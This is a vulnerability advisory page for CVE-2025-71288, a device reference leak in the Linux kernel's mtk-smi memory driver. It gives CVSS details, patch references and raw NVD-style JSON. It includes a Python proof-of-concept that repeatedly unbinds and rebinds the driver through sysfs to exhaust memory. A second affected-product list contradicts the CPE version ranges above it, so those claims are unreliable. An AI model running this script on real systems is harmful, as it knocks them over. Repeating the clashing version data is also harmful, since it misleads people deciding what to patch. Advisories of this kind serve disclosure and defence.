Security Vulnerability Report
CVE-2025-71288 CVSS 5.5 MEDIUM

CVE-2025-71288

Published: 2026-05-06 12:16:28
Last Modified: 2026-05-13 18:42:11
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

memory: mtk-smi: fix device leaks on common probe

Make sure to drop the reference taken when looking up the SMI device during common probe on late probe failure (e.g. probe deferral) and on driver unbind.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.16, before 6.1.167) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.2, before 6.6.130) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.7, before 6.12.77) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.13, before 6.18.17) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.19, before 6.19.6) - VULNERABLE
Linux Kernel < 6.8
Linux Kernel 6.8.x
Linux Kernel 6.9.x
Linux Kernel 6.10.x
Linux Kernel 6.11.x
Linux Kernel 6.12.x (before patching)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
PoC for CVE-2025-71288
This script attempts to trigger the device leak by repeatedly binding and
unbinding the mtk-smi driver, causing memory exhaustion over time.
"""
import os
import time
import sys

# Target driver path in sysfs
DRIVER_PATH = "/sys/bus/platform/drivers/mtk-smi-larb"
# Example device name, may vary based on hardware
DEVICE_NAME = "mtk-smi-larb0"


def trigger_leak():
    try:
        # Unbind the device to trigger remove path
        with open(os.path.join(DRIVER_PATH, "unbind"), "w") as f:
            f.write(DEVICE_NAME)

        # Bind the device to trigger probe path (where leak occurs)
        with open(os.path.join(DRIVER_PATH, "bind"), "w") as f:
            f.write(DEVICE_NAME)

        print(f"[+] Cycle completed: {DEVICE_NAME}")
    except FileNotFoundError:
        print("[-] Driver or device not found. System may not be vulnerable or hardware differs.")
        sys.exit(1)
    except PermissionError:
        print("[-] Permission denied. Root privileges required.")
        sys.exit(1)
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    print("[*] Starting PoC for CVE-2025-71288...")
    print("[*] Monitor memory usage (e.g., top/htop/free) to observe leak.")
    for i in range(1000):
        trigger_leak()
        time.sleep(0.05)  # Short delay to allow system processing
    print("[*] PoC execution finished.")
```

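References

https://git.kernel.org/stable/c/6cfa038bddd710f544076ea2ef7792fc82fbedd6 (Patch)
https://git.kernel.org/stable/c/9704564a70399c2787f5a7c5d347add721056e9d (Patch)
https://git.kernel.org/stable/c/984992f31cfb71b25cd0a72ef51ceb5dd6f187e8 (Patch)
https://git.kernel.org/stable/c/b16599fedf49fd42d174fba342a0b56103df3169 (Patch)
https://git.kernel.org/stable/c/b44d090d6ca159d94b59ad4cc44ffdaca094df82 (Patch)
https://git.kernel.org/stable/c/b8b2cf42b94c0a8efe43279643935256a6f58b9f (Patch)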

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71288", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:27.987", "lastModified": "2026-05-13T18:42:11.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmemory: mtk-smi: fix device leaks on common probe\n\nMake sure to drop the reference taken when looking up the SMI device\nduring common probe on late probe failure (e.g. probe deferral) and on\ndriver unbind."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.167", "matchCriteriaId": "2EDC6BAF-B710-4E26-B6AA-D68922EE7B43"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.130", "matchCriteriaId": "C57BB918-DF28-46B3-94F7-144176841267"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.77", "matchCriteriaId": "B3D12E00-E42D-4056-B354-BAD4903C03A5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": 
"6.18.17", "matchCriteriaId": "A5E006E4-59C7-43C1-9231-62A72219F2BA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/6cfa038bddd710f544076ea2ef7792fc82fbedd6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9704564a70399c2787f5a7c5d347add721056e9d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/984992f31cfb71b25cd0a72ef51ceb5dd6f187e8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b16599fedf49fd42d174fba342a0b56103df3169", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b44d090d6ca159d94b59ad4cc44ffdaca094df82", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b8b2cf42b94c0a8efe43279643935256a6f58b9f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}